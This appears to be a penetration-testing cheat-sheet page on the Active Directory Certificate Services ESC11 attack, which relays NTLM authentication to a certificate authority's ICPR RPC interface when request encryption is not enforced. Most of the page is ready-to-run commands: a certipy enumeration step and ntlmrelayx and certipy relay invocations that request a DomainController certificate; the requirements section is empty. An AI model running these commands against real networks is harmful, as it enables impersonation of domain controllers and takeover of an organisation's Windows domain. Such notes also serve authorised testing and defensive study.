Skip to content

Active Directory - Certificate ESC11

ESC11 - Relaying NTLM to ICPR

Encryption is not enforced for ICPR requests and Request Disposition is set to Issue.

Requirements:

Exploitation:

  1. Look for Enforce Encryption for Requests: Disabled in certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout output
  2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.

    ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
    certipy relay -target rpc://dc.domain.local -ca 'DOMAIN-CA' -template DomainController
    

References